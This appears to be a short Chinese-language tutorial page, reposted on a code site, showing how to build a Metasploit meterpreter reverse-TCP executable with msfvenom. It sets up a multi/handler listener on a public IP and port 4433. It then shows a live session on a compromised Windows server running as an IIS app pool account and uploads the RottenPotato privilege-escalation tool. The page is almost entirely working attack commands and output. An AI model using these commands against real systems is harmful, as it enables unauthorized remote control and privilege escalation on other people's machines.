msf制作反弹shell


msf制作shell

1 .制作反弹shell-exe文件

执行命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe

LHOST为公网IP

LPORT为反弹端口

4433.exe为生成文件

2.控制端启动msfconsole,获取监听

运行命令

msfconsle
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run


3.反弹成功
meterpreter > sysinfo
Computer        : WIN-UKKED2CCSHJ
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows

meterpreter > getuid
Server username: IIS APPPOOL\padt002

#上传文件
meterpreter > upload /root/RottenPotato/rottenpotato.exe
[*] uploading  : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] uploaded   : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM